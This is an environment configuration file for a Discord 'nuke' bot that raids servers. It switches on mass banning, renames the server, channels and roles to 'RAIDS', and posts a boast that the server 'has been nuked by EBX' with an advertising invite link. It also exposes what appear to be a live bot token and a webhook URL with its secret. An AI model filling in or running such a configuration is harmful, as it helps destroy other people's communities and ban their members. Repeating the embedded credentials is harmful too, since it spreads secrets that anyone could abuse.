BOT_TOKEN="MTM1OTIzOTIzMjAwNjI2Mjk4Ng.G-rOYM.dbTwp_IQZV6aVy91aLlzRX8TVcBYJwGlR_yp1Q"
BOT_OWNER_ID="1354098483753259031"

MASS_BAN=true

WEBHOOK_URL="https://discord.com/api/webhooks/1359239737856233654/hOo940rL2H8GiJFT2jziBWKSs0cBlUy9Fap-TPbZ5FmYN4R6lU4Z14a3Duz-hcdnGVD2"
AVATAR_URL="https://i.imgur.com/cOmcxRt.jpeg"

PREFERRED_LOCALE="el"

CHANNEL_NAME=">>RAIDS<<"
SERVER_NAME="<<RAIDS>>"
ROLE_NAME="RAIDs"


EMBED_TITLE="Your server has been nuked by EBX"
EMBED_DESCRIPTION="```EBK IS THE BEST PACKING SERVER JOIN NOW!https://discord.gg/ErwHGvgh4Z"```
